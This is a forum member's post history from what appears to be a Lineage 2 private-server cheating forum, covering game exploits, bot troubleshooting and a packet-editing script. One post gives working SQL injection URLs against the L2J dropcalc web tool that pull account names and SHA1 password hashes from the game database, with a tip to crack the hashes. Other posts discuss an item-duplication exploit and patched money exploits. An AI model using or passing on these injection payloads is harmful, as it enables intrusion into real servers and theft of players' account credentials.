Jump to content

raouf67

Members
  • Posts

    68
  • Credits

  • Joined

  • Last visited

  • Feedback

    0%

Posts posted by raouf67

  1. I think i heard about this exploit, a friend tell me about this recently, i thought that it wasnt working(cause i tested it only on my server), but i tested it in another l2J C6 server and it seems to work !

    In the server where i play, i have the following probleme :

    when i clik send, i have the fake item equiped, and the other on the wh, but it seems enchant nothing, and the enchants weapon didnt disappear (ex i have 1 enchant and 1item +4, i clik send and i have the item +4 on wh and the enchant in the inventory with fake item +4 equiped). But in another server L2J C6 it work perfectly !

    So maybe it fixed in the server where i play or i do something wrong. Im going to try it another time..

    If someone have the same probleme, please post next  ;)

  2. This concerns only The michelles L2J dropcalc V4

     

    SQL Injection: !! You must be logged in, using your own username and Token !!

     

    Obtain a player username with sql injection :

     

    http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

     

    !! you must put the token, User and PLAYER without the "[]" !!

     

    Obtain a password for that username (encrypted with SHA1) :

     

    -- > !! only valid if loginserver and gameserver are in the same machine !!

    http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

     

    Then you have the password encrypted in SHA1  :)

    You must decrypt it (don't worry it's easy)

    Go Here --> http://md5encryption.com/

     

    Now you have the password of the player  ;D

     

     

     

  3. Hello

     

    I am playing on this server "88.191.30.28" (C5 server). I am using l2Walker 10.8.6 and when i try to login I got "verify fail"

     

    Can someone give me OOG version of l2walker which is working  :-[

     

    Thanks in advance  ;)

     

    EDIT : so it's working now, but when i login and select my character i have :

     

    16:18:19 Link LoginServer Succeed.

    16:18:23 Login LoginServer Succeed.

    16:18:23 服务器[01]当前在线率:54.50%,能否登陆:能

    16:18:27 Link GameServer Succeed.

    16:18:34 Packet Error ...

     

    EDIT 2 :So, now it dont tell me packet error but when i see my character in the map l2walker exit  :o :o

     

    ??? ??? ???

  4. nice....... u are registered from octomber, and u knew about that and u didn't share.......... nice forum members.... lol

    and about that thing, lock it up, its OLD

     

    When i was going to share it, exactly in the same day, the exploit "how to log in any account" was shared. I think that it was the same thing !

     

    (sry for bad english :) )

  5. hello everybody i found this script for hlapex, but i don't know what it can do :

     

    var

    i,uid,sid,trash:integer;

    name:string;

     

    begin

    if FromServer then exit;

    if pck[1]=#$08 then

    begin

    i:=2;

    name:=ReadS(i);

    uid:=ReadD(i);

    sid:=ReadD(i);

    ReadD(i); //UID второй раз

    trash:=ReadD(i);

     

    buf:=#$08;

    WriteS(name);

    WriteD(uid);

    WriteD(sid);

    WriteD(uid);

    WriteD(trash);

    pck:=buf;

    end;

    end.

     

    If anyone can try it and tell us! thank you

  6. Yes fixed for me after server update of yesterday :evil: :cry: When i send the code i am jailed :evil: How I can do to earn money now !!!!!!!!!!!!!!!

    And I think that the Quest packet fixed to !!!!!!!!! I send the packet i have the text who say to me that the quest is finish but not money !!!!!!! NOOOOOOOOOOOOOOO !! Help me ! Any other quest ID ?? please stupid update :evil:

    Sorry for very very bad english :x

×
×
  • Create New...